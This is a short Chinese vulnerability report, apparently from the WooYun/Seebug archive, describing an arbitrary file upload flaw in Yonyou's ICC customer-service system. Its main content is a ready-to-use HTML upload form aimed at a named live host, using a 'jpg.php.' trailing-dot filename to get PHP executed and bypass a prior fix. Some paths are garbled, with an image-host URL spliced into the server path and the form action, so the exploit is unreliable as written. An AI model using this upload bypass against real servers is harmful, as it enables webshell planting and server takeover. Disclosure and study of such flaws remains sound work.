### 简要描述:
再再暴用友ICC网站客服系统任意文件上传漏洞,看了一下上一个漏洞:http://www.wooyun.org/bugs/wooyun-2010-06749,发现可以饶过官方修复。
### 详细说明:
测试多个网站均存在漏洞。
/home/ecccs/web/5107https://images.seebug.org/upload/screenImagesSave.php
具体自己看源码这里直接给出利用代码。
```
<form enctype="multipart/form-data" method="post"
action="http://icc.5107.cn/5107https://images.seebug.org/upload/screenImagesSave.php?filename=jpg.php.">
<input type="file" name="file">
<input type="submit" name="up" value="上传">
</form>
```
上一个是jpg.php 这个是只要在jpg.php后面加个.那么 上传后一样可以解析
http://xxx.com/xxx.php. 这样一样可以解析为 php 的。
测试了:
http://icc.5107.cn/
### 漏洞证明:
http://icc.5107.cn/data/guige.txt
[<img src="https://images.seebug.org/upload/201206/061834473941b156dd33a18ebc6af243d013cb39.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201206/061834473941b156dd33a18ebc6af243d013cb39.jpg)
暂无评论